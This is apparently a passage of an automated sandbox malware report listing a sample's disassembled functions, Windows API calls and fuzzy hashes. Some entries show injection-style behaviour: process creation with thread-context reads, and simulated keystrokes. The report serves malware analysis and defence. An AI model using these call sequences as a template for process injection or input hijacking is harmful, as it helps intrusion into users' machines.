                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                        • String ID:
                                                                        • API String ID: 1046115767-0
                                                                        • Opcode ID: 7f63aa0e653a95e0a97dc096070c6d03b0d1fb9a9f669285897a21dd5ccf2239
                                                                        • Instruction ID: 85274436990d743b068ff025d1176e8668c39b7bf874ade1acd2e04f7fd9dced
                                                                        • Opcode Fuzzy Hash: 7f63aa0e653a95e0a97dc096070c6d03b0d1fb9a9f669285897a21dd5ccf2239
                                                                        • Instruction Fuzzy Hash: D111C2B28056108ADF11FF64C8423597AE16F81331F262340E5607F3F3DBF48D4096A5
                                                                        APIs
                                                                          • Part of subcall function 00E9395C: __FF_MSGBANNER.LIBCMT ref: 00E93973
                                                                          • Part of subcall function 00E9395C: __NMSG_WRITE.LIBCMT ref: 00E9397A
                                                                          • Part of subcall function 00E9395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00E8F507,?,0000000E), ref: 00E9399F
                                                                        • std::exception::exception.LIBCMT ref: 00E8F51E
                                                                        • __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                          • Part of subcall function 00E96805: RaiseException.KERNEL32(?,?,0000000E,00F26A30,?,?,?,00E8F538,0000000E,00F26A30,?,00000001), ref: 00E96856
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3902256705-0
                                                                        • Opcode ID: b9392820977d4a574e11faa190b447c2276d12464dc203f109ecc4d5af245ba6
                                                                        • Instruction ID: 25e02a8e656aad5282f11267d8ca65cad36a194b57631e797cf5d4c248fe665c
                                                                        • Opcode Fuzzy Hash: b9392820977d4a574e11faa190b447c2276d12464dc203f109ecc4d5af245ba6
                                                                        • Instruction Fuzzy Hash: 02F0A43110421EA7DB04BF98EC029EE7BE89F04354F605126FA0CF2181DBB0DB5097A5
                                                                        APIs
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • __lock_file.LIBCMT ref: 00E93629
                                                                          • Part of subcall function 00E94E1C: __lock.LIBCMT ref: 00E94E3F
                                                                        • __fclose_nolock.LIBCMT ref: 00E93634
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: 38ba236d5c48d19dba54a1e236455b9f1e3c10b7e5fa6753d1b8c3d6d3048da3
                                                                        • Instruction ID: b6480ed8065af74e4c86152de6a6c9e158da535822d2f7bcb795409ea5164184
                                                                        • Opcode Fuzzy Hash: 38ba236d5c48d19dba54a1e236455b9f1e3c10b7e5fa6753d1b8c3d6d3048da3
                                                                        • Instruction Fuzzy Hash: AAF0BB72801204AADF11FFB5880275E76E06F41734F259109E411FB2C3C77C8B019B55
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 017CDE5B
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CDEF1
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CDF13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                        • Instruction ID: b962dd26a822cc1b3ef72184b3ef2f43bbc4ed1b481a90885b1663d52f60b8c5
                                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                        • Instruction Fuzzy Hash: B612CE24E18658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A
                                                                        APIs
                                                                        • __flush.LIBCMT ref: 00E92A0B
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __flush__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 4101623367-0
                                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction ID: 7576f63a80b75d28aa750136dad3e0e6149a47116a4c84a0d32ffbc91f6e6ce2
                                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                        • Instruction Fuzzy Hash: 5C41B672700706BFDF2C8E69C8805AE77B6AF85364F24A53DEA55E7240EBB0DD458B40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: b723ac65bec49ff3bc6ac4196ca4a32a17699c347a9475c0070a786203d25b98
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 6231E870A00105DBC718EF68C4809A9FBA6FF49344B64A6A5E40DEB3A5DB30EDC5CB80
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: f903b15e28c83fc438fafec0c7791c08c2ebfd909defce56ae012bf77ad1d644
                                                                        • Instruction ID: 010f6b4c5693145da84a4bdd165c44ed57b261d6d623da579366c066c081b8a0
                                                                        • Opcode Fuzzy Hash: f903b15e28c83fc438fafec0c7791c08c2ebfd909defce56ae012bf77ad1d644
                                                                        • Instruction Fuzzy Hash: C34149705046518FDB24DF19C484B1ABBE0BF45308F1999ACE99E6B362C372E886CF52
                                                                        APIs
                                                                          • Part of subcall function 00E74214: FreeLibrary.KERNEL32(00000000,?), ref: 00E74247
                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E739FE,?,00000001), ref: 00E741DB
                                                                          • Part of subcall function 00E74291: FreeLibrary.KERNEL32(00000000), ref: 00E742C4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Free$Load
                                                                        • String ID:
                                                                        • API String ID: 2391024519-0
                                                                        • Opcode ID: a9358b45654e463d5776e8941741e703871beff1f793aa6068c9beecb3728b2d
                                                                        • Instruction ID: 061b6efbd895bc6de08e4b765e4401f2fddfae6cc291bfeae504f2125a4f3d86
                                                                        • Opcode Fuzzy Hash: a9358b45654e463d5776e8941741e703871beff1f793aa6068c9beecb3728b2d
                                                                        • Instruction Fuzzy Hash: D61194B170020ABADF14AB74DC06BAE77E99F40704F10D429B59AB61D2EB709A149B60
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 48d682e0313c83b1ffaa40571bf1062f2f72b8e72bf7a755a642666a2d2bf9f1
                                                                        • Instruction ID: 4dcca973028b80a9e7c0d5811737dc65fa2143ee9aef6e0b929ed0cf4bb9b0d8
                                                                        • Opcode Fuzzy Hash: 48d682e0313c83b1ffaa40571bf1062f2f72b8e72bf7a755a642666a2d2bf9f1
                                                                        • Instruction Fuzzy Hash: 8F2124705086018FDB24EF68C444A1ABBE1BF89308F15996CE99E6B262D731E849CF52
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 00E9AFC0
                                                                          • Part of subcall function 00E97BDA: __getptd_noexit.LIBCMT ref: 00E97BDA
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                        • String ID:
                                                                        • API String ID: 1144279405-0
                                                                        • Opcode ID: bb142277eb7d7079ad49175668309c2e8f535cfd068c373242907da23c6864b6
                                                                        • Instruction ID: 10231a6e38fbe6a721c4cd1c6fdbaee0d668e2045dc4cd96cde70ddf73a2d45e
                                                                        • Opcode Fuzzy Hash: bb142277eb7d7079ad49175668309c2e8f535cfd068c373242907da23c6864b6
                                                                        • Instruction Fuzzy Hash: 9D11C4B28156048FDF127FA4E94239A76E1AF41335F2A6240E4743F2E2DBB48D049BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                        • Instruction ID: 81abca9f7a981b94b77590035f1a2acf43120decc0a9b531ee92cc59693eafbc
                                                                        • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                        • Instruction Fuzzy Hash: BA01867150014DAECF04EF64C8828EEBBB8EF10304F10D069B516B71A5EB309A49DB60
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 00E92AED
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2597487223-0
                                                                        • Opcode ID: a0db23d5955e04bea0a8204264f50387ec0bc7a4ed0f45432b1f10595aaec437
                                                                        • Instruction ID: 561e0a200824fe58a14535c546bde3e88cca22632e737a5589783c341ad0f635
                                                                        • Opcode Fuzzy Hash: a0db23d5955e04bea0a8204264f50387ec0bc7a4ed0f45432b1f10595aaec437
                                                                        • Instruction Fuzzy Hash: A4F06D72900205BADF21AF748C0679F3AE5BF40324F15A41AF914BA1A1D7B88A56DB52
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00E739FE,?,00000001), ref: 00E74286
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 36608e590b832315ce73d51eaa10eb3d3edfce8ee429a0889082da0474164495
                                                                        • Instruction ID: 95173eee6d76da879ce72bcbe42cf60e92a44e24a0aa6b6c9120c2e1621ee2c0
                                                                        • Opcode Fuzzy Hash: 36608e590b832315ce73d51eaa10eb3d3edfce8ee429a0889082da0474164495
                                                                        • Instruction Fuzzy Hash: 1FF0A0B0409341CFCB348F60D880812BBF4BF04319320DA3EF1DAA2561C7319960CF40
                                                                        APIs
                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E740C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID:
                                                                        • API String ID: 82841172-0
                                                                        • Opcode ID: 5dff4576946511719518b88be64bc81728ca022854be1402d4ff11c26427f6da
                                                                        • Instruction ID: e0eae5767cd1a91a9f4022f534a478e4b12bc28c9d478e89dee048e5458fa9fe
                                                                        • Opcode Fuzzy Hash: 5dff4576946511719518b88be64bc81728ca022854be1402d4ff11c26427f6da
                                                                        • Instruction Fuzzy Hash: F7E0C236A002246BCB21A758CC46FFA77EDDFC86A4F0940B5F90DF7248DA64E9819690
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 017CE6B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00EDF87D
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EDF8DC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EDF919
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EDF940
                                                                        • SendMessageW.USER32 ref: 00EDF966
                                                                        • _wcsncpy.LIBCMT ref: 00EDF9D2
                                                                        • GetKeyState.USER32(00000011), ref: 00EDF9F3
                                                                        • GetKeyState.USER32(00000009), ref: 00EDFA00
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EDFA16
                                                                        • GetKeyState.USER32(00000010), ref: 00EDFA20
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EDFA4F
                                                                        • SendMessageW.USER32 ref: 00EDFA72
                                                                        • SendMessageW.USER32(?,00001030,?,00EDE059), ref: 00EDFB6F
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00EDFB85
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EDFB96
                                                                        • SetCapture.USER32(?), ref: 00EDFB9F
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDFC03
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EDFC0F
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00EDFC29
                                                                        • ReleaseCapture.USER32 ref: 00EDFC34
                                                                        • GetCursorPos.USER32(?), ref: 00EDFC69
                                                                        • ScreenToClient.USER32(?,?), ref: 00EDFC76
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EDFCD8
                                                                        • SendMessageW.USER32 ref: 00EDFD02
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EDFD41
                                                                        • SendMessageW.USER32 ref: 00EDFD6C
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EDFD84
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EDFD8F
                                                                        • GetCursorPos.USER32(?), ref: 00EDFDB0
                                                                        • ScreenToClient.USER32(?,?), ref: 00EDFDBD
                                                                        • GetParent.USER32(?), ref: 00EDFDD9
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EDFE3F
                                                                        • SendMessageW.USER32 ref: 00EDFE6F
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDFEC5
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EDFEF1
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EDFF19
                                                                        • SendMessageW.USER32 ref: 00EDFF3C
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDFF86
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EDFFB6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EE004B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 2516578528-4164748364
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EDB1CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 3850602802-328681919
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00E8EB4A
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EE3AEA
                                                                        • IsIconic.USER32(000000FF), ref: 00EE3AF3
                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00EE3B00
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EE3B0A
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EE3B20
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EE3B27
                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00EE3B33
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EE3B44
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EE3B4C
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EE3B54
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EE3B57
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B6C
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3B77
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B81
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3B86
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B8F
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3B94
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B9E
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3BA3
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EE3BA6
                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00EE3BCD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
